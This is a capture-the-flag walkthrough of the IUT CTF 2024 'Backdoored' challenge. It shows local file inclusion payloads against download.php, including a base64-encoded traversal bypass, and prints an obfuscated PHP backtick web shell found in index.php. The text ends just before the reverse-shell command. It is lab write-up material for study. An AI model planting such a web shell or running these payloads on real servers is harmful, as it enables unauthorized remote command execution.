IUT CTF 2024 - Backdoored Walkthrough
May 09, 2024
Assalamu Alaikum, Hey there I'm Robiul Awal Fagun aka 0xRobiul and you all know "I'm alone, I'm Infinity,I'm From 0xInfinity!".
Let's jump in...
First things first, as always I started to look all around the source code, and I found the first flag in a java script file named main.js inside /static/js/main.js.
Also I got something interesting just below the flag as you can see.
Let's move into next..
As i got something interesting on previous challenge so i started my game from here.
After taking a look on that, the first thing came in my mind is Local File Inclusion(LFI), download.php allows to download file and the parameter file= contains the file name about to be download.
As the challenge description said to check server-side file, so I started to look for the exact download.php that I'm currently in.
So I started to send my payloads after /download.php?file= like:
```After trying same type of payload I moved and started to use LFI Bypass Techniques and finally i become success with this payload ...//download.php and I send this like /download.php?file=Li4uLy9kb3dubG9hZC5waHAK , that returns me the flag.download.php../../download.phpLi4vLi4vZG93bmxvYWQucGhwCg== (Base64 Encoded)```
As they mentioned backdoor injected in a server-side file but there wasn't anything suspicious on download.php , so I started to look for the backdoor and got with the same payload in index.php file. That looks like:
After hunting on GitHub I found it's a backtick shell and it's obfuscated:
````<?php $_=``.[];$__=@$_;$_= $__[0]; $_1 = $__[2]; $_1++;$_1++;$_1++;$_1++;$_1++;$_1++;$_++;$_++;$_0 = $_;$_++;$_2 = ++$_; $_55 = '_'.(','^'|').('/'^'`').('-'^'~').(')'^'}'); $_ = $_2.$_1.$_2.$_0; $_($$_55[_]);?>````
And this part of this code represents the parameter I'm about to use:
````$_($$_55[_]); ````
I used my VPS for getting call-back of the reverse shell and used this command: